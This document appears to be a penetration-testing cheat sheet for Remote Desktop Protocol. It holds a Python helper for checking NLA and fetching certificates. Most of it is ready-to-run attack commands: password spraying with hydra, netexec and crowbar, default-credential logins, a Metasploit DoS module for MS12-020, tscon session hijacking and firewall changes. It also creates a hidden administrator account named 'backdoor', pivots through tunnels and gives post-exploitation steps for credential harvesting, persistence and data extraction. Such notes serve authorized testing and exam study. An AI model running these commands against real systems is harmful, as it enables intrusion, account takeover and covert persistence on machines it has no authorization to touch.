Remote Desktop Protocol

Environment Variables / Setup

export IP=
export PORT=3389
export USER=administrator
export PASS=password
export DOMAIN=domain.local

Phase 1: RDP Service Discovery

Nmap RDP Scripts

nmap --script=rdp-* -p $PORT $IP

Service Detection

# Check RDP service
nmap -sV -p $PORT $IP

# Check for RDP security layers
nmap --script rdp-enum-encryption -p $PORT $IP

# Check for MS12-020 (CVE-2012-0002); this script does not test BlueKeep (CVE-2019-0708), see Phase 5
nmap --script rdp-vuln-ms12-020 -p $PORT $IP

Phase 2: RDP Authentication Testing

Anonymous/Guest Access

# Test guest login
rdesktop -g 1024x768 -u guest -p "" $IP
xfreerdp /v:$IP /u:guest /p:"" /cert:ignore

# Test with null session
xfreerdp /v:$IP /u:"" /p:"" /cert:ignore

Default Credentials Testing

# Common RDP default credentials
xfreerdp /v:$IP /u:administrator /p:password /cert:ignore
xfreerdp /v:$IP /u:administrator /p:admin /cert:ignore
xfreerdp /v:$IP /u:administrator /p:"" /cert:ignore
xfreerdp /v:$IP /u:admin /p:admin /cert:ignore
xfreerdp /v:$IP /u:user /p:user /cert:ignore

# Domain authentication
xfreerdp /v:$IP /u:$DOMAIN\\$USER /p:$PASS /cert:ignore

Password Spraying

# Using hydra
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -t 1 -V $IP rdp

# Using netexec
netexec rdp $IP -u users.txt -p 'Password123!' --continue-on-success

# Using crowbar (-U/-C take files, -u/-c take a single username/password)
crowbar -b rdp -s $IP/32 -U users.txt -C passwords.txt

Phase 3: RDP Connection Methods

Standard RDP Connection

# Using xfreerdp (recommended)
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /size:1024x768

# Using rdesktop
rdesktop -g 1024x768 -u $USER -p $PASS $IP

# With domain authentication
xfreerdp /v:$IP /d:$DOMAIN /u:$USER /p:$PASS /cert:ignore

Advanced Connection Options

# Enable clipboard sharing
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +clipboard

# Enable drive redirection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /drive:share,/tmp

# Enable printer redirection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +printer

# Full screen mode
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /f

Phase 4: RDP Security Assessment

Encryption and Security

# Check encryption level
nmap --script rdp-enum-encryption -p $PORT $IP

# Check for Network Level Authentication (NLA)
# rdp-enum-encryption (above) lists the accepted security layers: if only "CredSSP (NLA)"
# succeeds, NLA is enforced; if "Native RDP" or "SSL" also succeed, NLA is not enforced
# NLA enabled = more secure, CredSSP authentication must succeed before a session is created
# NLA disabled = unauthenticated clients reach the logon screen and pre-auth bugs such as BlueKeep

Certificate Analysis

# Extract RDP certificate
nmap --script ssl-cert -p $PORT $IP

# Check certificate validity and information
# openssl s_client has no -starttls mode for RDP (TLS is negotiated after an X.224 exchange),
# so save the PEM printed by "nmap -vv --script ssl-cert -p $PORT $IP" as rdp_cert.pem first
openssl x509 -noout -text -in rdp_cert.pem
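The NLA check and certificate steps above lean on nmap because RDP only starts TLS after an X.224 Connection Request/Confirm exchange. The script below is an added example, not part of the original notes: it performs that negotiation from MS-RDPBCGR by hand, so `nla_enforced()` tells you whether a host refuses plain TLS with HYBRID_REQUIRED_BY_SERVER (NLA mandatory), and `fetch_cert_pem()` returns the server certificate as PEM for `openssl x509 -noout -text`. Host and port are assumptions supplied by the caller; no cookie/routing token is sent.

```python
import socket
import ssl
import struct

# requestedProtocols flags from RDP_NEG_REQ (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0, 1, 2
# failureCode values from RDP_NEG_FAILURE (MS-RDPBCGR 2.2.1.2.2)
FAILURES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
            3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
            5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}

def build_x224_cr(requested):
    # TPKT header + X.224 Connection Request TPDU + RDP_NEG_REQ (type 1, flags 0, length 8)
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested)
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224

def parse_x224_cc(data):
    # Returns ("selected", protocol) or ("failure", reason) from the X.224 Connection Confirm
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        return ("invalid", None)
    if len(data) < 19:                  # no rdpNegData: old server, standard RDP security only
        return ("selected", PROTOCOL_RDP)
    neg_type, _flags, _len, value = struct.unpack_from("<BBHI", data, 11)
    if neg_type == 0x02:
        return ("selected", value)
    if neg_type == 0x03:
        return ("failure", FAILURES.get(value, "unknown"))
    return ("invalid", None)

def nla_enforced(host, port=3389, timeout=5):
    # Asking for plain TLS only and being refused with HYBRID_REQUIRED_BY_SERVER means NLA is mandatory
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_x224_cr(PROTOCOL_SSL))
        return parse_x224_cc(s.recv(1024)) == ("failure", "HYBRID_REQUIRED_BY_SERVER")

def fetch_cert_pem(host, port=3389, timeout=5):
    # Do the X.224 step ourselves, then wrap the same socket in TLS and read the certificate
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE   # inspect the cert, do not trust it
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_x224_cr(PROTOCOL_SSL | PROTOCOL_HYBRID))  # both layers run over TLS
        kind, proto = parse_x224_cc(s.recv(1024))
        if kind != "selected" or proto not in (PROTOCOL_SSL, PROTOCOL_HYBRID):
            raise RuntimeError(f"server offered no TLS security layer: {kind} {proto}")
        with ctx.wrap_socket(s, server_hostname=host) as tls:
            return ssl.DER_cert_to_PEM_cert(tls.getpeercert(binary_form=True))
```

Pipe the PEM into `openssl x509 -noout -text` to check issuer, validity dates and whether it is the self-signed default.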

Phase 5: RDP Vulnerability Exploitation

BlueKeep (CVE-2019-0708)

# Check for BlueKeep (nmap's rdp-vuln-ms12-020 script tests MS12-020, not CVE-2019-0708)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

# Only affects:
# Windows 7, Windows Server 2008 R2, Windows Server 2008
# Windows XP, Windows Server 2003

MS12-020 (CVE-2012-0002)

# Check for MS12-020 vulnerability (nmap script), or trigger it with the Metasploit DoS module
nmap --script rdp-vuln-ms12-020 -p $PORT $IP
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Note: Only use DoS exploits in controlled environments, not during OSCP exam

Phase 6: RDP Session Hijacking

Session Enumeration

# List active sessions (requires admin access)
query session
qwinsta

# Get detailed session info
query user

Session Hijacking (Requires SYSTEM)

# Hijack session (requires SYSTEM privileges)
tscon <session_id> /dest:<target_session>

# Example: Hijack session 2 to console
tscon 2 /dest:console

Phase 7: RDP Persistence & Post-Exploitation

Enable RDP (If Not Enabled)

# Enable RDP via registry
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Enable RDP via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

# Add firewall exception
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389

Create Backdoor User

# Add user with RDP privileges
net user backdoor Password123! /add
net localgroup "Remote Desktop Users" backdoor /add
net localgroup administrators backdoor /add

# Hide user from login screen (optional)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0 /f

Phase 8: RDP File Transfer

File Transfer via RDP

# Enable drive redirection during connection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /drive:share,/tmp

# Files will be accessible at \\tsclient\share\ on Windows target
# Copy files from shared drive to target
copy \\tsclient\share\file.exe C:\temp\

Clipboard File Transfer

# Enable clipboard sharing
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +clipboard

# Copy small files via clipboard (base64 encode for binaries)
base64 -w 0 file.exe | xclip -selection clipboard
# Paste in target, then decode

Phase 9: RDP Network Pivoting

RDP Tunneling

# Create SSH tunnel for RDP through a pivot host ($PIVOT_IP) to the internal target ($TARGET_IP)
ssh -L 3389:$TARGET_IP:3389 user@$PIVOT_IP

# Connect through tunnel
xfreerdp /v:localhost:3389 /u:$USER /p:$PASS /cert:ignore

Port Forwarding via RDP

# Once connected via RDP, use netsh for port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

RDP Security Misconfigurations

Common Issues to Check

  1. Default credentials (administrator with weak passwords)
  2. Guest account enabled with RDP access
  3. No Network Level Authentication (NLA disabled)
  4. Weak encryption settings
  5. Overly permissive user groups in Remote Desktop Users
  6. RDP enabled on internal systems without proper access controls
  7. Outdated systems vulnerable to BlueKeep

RDP Attack Vectors

Authentication Attacks

  • Password spraying against known usernames
  • Credential stuffing with breached credentials
  • Default credential testing
  • Brute force attacks (use with caution - causes account lockouts)

Session-Based Attacks

  • Session hijacking (requires SYSTEM privileges)
  • Credential harvesting from memory
  • Pass-the-hash attacks via RDP

RDP Enumeration Checklist

  • Service discovery and version identification
  • Vulnerability scanning (BlueKeep, MS12-020)
  • Anonymous/guest access testing
  • Default credentials testing
  • Password spraying (careful with lockouts)
  • Certificate analysis
  • Encryption assessment
  • Session enumeration (if access gained)

Tools Summary

# Enumeration
nmap rdp scripts, rdesktop, xfreerdp

# Authentication attacks
hydra, crowbar, netexec

# Connection tools
xfreerdp (preferred), rdesktop

Common RDP Ports

3389/tcp  - RDP default
3390/tcp  - RDP alternate (sometimes used)

Next Steps

Once RDP access is gained:

  1. Enumerate local system for privilege escalation
  2. Harvest credentials from memory/registry
  3. Enable persistence mechanisms
  4. Pivot to internal network resources
  5. Extract sensitive data via GUI access

Resources